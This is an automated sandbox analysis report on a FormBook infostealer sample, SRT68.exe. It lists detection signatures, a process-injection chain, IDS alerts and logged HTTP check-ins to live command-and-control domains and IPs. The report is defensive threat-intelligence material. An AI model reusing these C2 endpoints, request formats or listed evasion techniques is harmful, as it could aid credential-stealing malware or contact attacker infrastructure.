Windows Analysis Report
SRT68.exe

Overview

General Information

Sample name: SRT68.exe
Analysis ID: 1568958
MD5: 71829b1e3a8cc54976390920f8c9282b
SHA1: 60777574082f65fa3436acd404fcec9fe8dd4c80
SHA256: feaa7b0c24315f2516cc912f47bf1dce6cef3f007ccf05f94b0214ecdf255b3d
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Child Process Spawned By Odbcconf.EXE
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SRT68.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\SRT68.exe" MD5: 71829B1E3A8CC54976390920F8C9282B)
    • svchost.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\SRT68.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VdxisCThGA.exe (PID: 6040 cmdline: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • odbcconf.exe (PID: 7552 cmdline: "C:\Windows\SysWOW64\odbcconf.exe" MD5: D567FFF92055255DBE43BF8F989A4B7E)
          • VdxisCThGA.exe (PID: 5952 cmdline: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7888 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source                                                                                  Rule                    Description             Author        Strings
00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
(2 further entries not shown)

Source                               Rule                    Description             Author        Strings
2.2.svchost.exe.400000.0.unpack      JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
2.2.svchost.exe.400000.0.raw.unpack  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security

System Summary

Source: Process started, Author: Harjot Singh @cyb3rjy0t, Data: Command: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , CommandLine: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, NewProcessName: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, OriginalFileName: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, ParentCommandLine: "C:\Windows\SysWOW64\odbcconf.exe", ParentImage: C:\Windows\SysWOW64\odbcconf.exe, ParentProcessId: 7552, ParentProcessName: odbcconf.exe, ProcessCommandLine: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , ProcessId: 5952, ProcessName: VdxisCThGA.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\SRT68.exe", CommandLine: "C:\Users\user\Desktop\SRT68.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SRT68.exe", ParentImage: C:\Users\user\Desktop\SRT68.exe, ParentProcessId: 7440, ParentProcessName: SRT68.exe, ProcessCommandLine: "C:\Users\user\Desktop\SRT68.exe", ProcessId: 7496, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\SRT68.exe", CommandLine: "C:\Users\user\Desktop\SRT68.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SRT68.exe", ParentImage: C:\Users\user\Desktop\SRT68.exe, ParentProcessId: 7440, ParentProcessName: SRT68.exe, ProcessCommandLine: "C:\Users\user\Desktop\SRT68.exe", ProcessId: 7496, ProcessName: svchost.exe
Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-12-05T09:43:27.768718+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49708        81.2.196.19      80                TCP
2024-12-05T09:43:53.418925+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49712        103.249.106.91   80                TCP
2024-12-05T09:44:08.368003+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49717        13.248.169.48    80                TCP
2024-12-05T09:44:23.579928+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49721        195.110.124.133  80                TCP
2024-12-05T09:44:38.396713+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49725        209.74.77.107    80                TCP
2024-12-05T09:44:53.167690+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49729        84.32.84.32      80                TCP
2024-12-05T09:45:08.519235+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49733        154.88.22.105    80                TCP
2024-12-05T09:45:23.962628+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49737        85.159.66.93     80                TCP
2024-12-05T09:45:38.915975+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49741        199.59.243.227   80                TCP
2024-12-05T09:45:53.979627+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49745        91.226.30.3      80                TCP
2024-12-05T09:46:08.717861+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49749        13.248.169.48    80                TCP
2024-12-05T09:46:23.882892+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49753        185.27.134.144   80                TCP
2024-12-05T09:46:39.481719+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49757        85.159.66.93     80                TCP
2024-12-05T09:46:54.675852+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.8  49761        154.23.184.207   80                TCP

AV Detection

Source: http://www.appsolucao.shop/qize/, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/pxvi/, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg, Avira URL Cloud: Label: malware
Source: http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg, Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME, Avira URL Cloud: Label: malware
Source: appsolucao.shop, Virustotal: Detection: 10%
Source: SRT68.exe, ReversingLabs: Detection: 50%
Source: SRT68.exe, Virustotal: Detection: 32%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: SRT68.exe, Joe Sandbox ML: detected
Source: SRT68.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VdxisCThGA.exe, 00000003.00000000.1410310417.000000000030E000.00000002.00000001.01000000.00000004.sdmp, VdxisCThGA.exe, 00000006.00000000.1569343495.000000000030E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: odbcconf.pdb source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: odbcconf.pdbGCTL source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0100445A
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0100C75C
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100C6D1 FindFirstFileW,FindClose, 0_2_0100C6D1
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0100EF95
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0100F0F2
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0100F3F3
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_010037EF
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_01003B12
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0100BCBC
Source: C:\Windows\SysWOW64\odbcconf.exe, Code function: 4_2_02EEC6C0 FindFirstFileW,FindNextFileW,FindClose, 4_2_02EEC6C0
Source: C:\Windows\SysWOW64\odbcconf.exe, Code function: 4x nop then xor eax, eax 4_2_02ED9EC0
Source: C:\Windows\SysWOW64\odbcconf.exe, Code function: 4x nop then mov ebx, 00000004h 4_2_04CA04EA

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 199.59.243.227:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49708 -> 81.2.196.19:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 154.23.184.207:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 154.88.22.105:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 91.226.30.3:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 103.249.106.91:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 85.159.66.93:80
Source: DNS query: www.8600228.xyz
Source: DNS query: www.avalanchefi.xyz
Source: DNS query: www.amayavp.xyz
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, IP Address: 209.74.77.107
Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 16 times)
Source: C:\Users\user\Desktop\SRT68.exe, Code function: 0_2_010122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_010122EE
Source: global traffic, HTTP traffic detected:
    GET /zzs5/?t8=erepa0aHg&dpy4vDKP=S2OsCDyvlLRi8QWYXg1pYm60P988fDuoEbyrPuxNzPrnmbTjDj97FaXU9n32cQowhVlW8PNou7nXPbuRJkerLzsl2XtEg5/IjfyZCmafOy2/D+uD8ZFJuIO6v1d/wwnCHw== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.bagatowcannabis.cloud
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.8600228.xyz
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.remedies.pro
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /io9k/?dpy4vDKP=JSfqOM1hntmKPRX8QapMCMaojpQJWGU7F5uIf0M4pwAd1rq+GgCVpaF7coK3O/ojAayWDC1AXCc++TdMJ3it9pzzLzylaJ3SA3sw8PdpX1afK4k48hvBTosEFJxP8txHbg==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.officinadelpasso.shop
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.liveplah.live
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.appsolucao.shop
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.cg19g5.pro
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.kuyubak.online
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.acond-22-mvr.click
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.vpnto.net
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.avalanchefi.xyz
    Connection: close
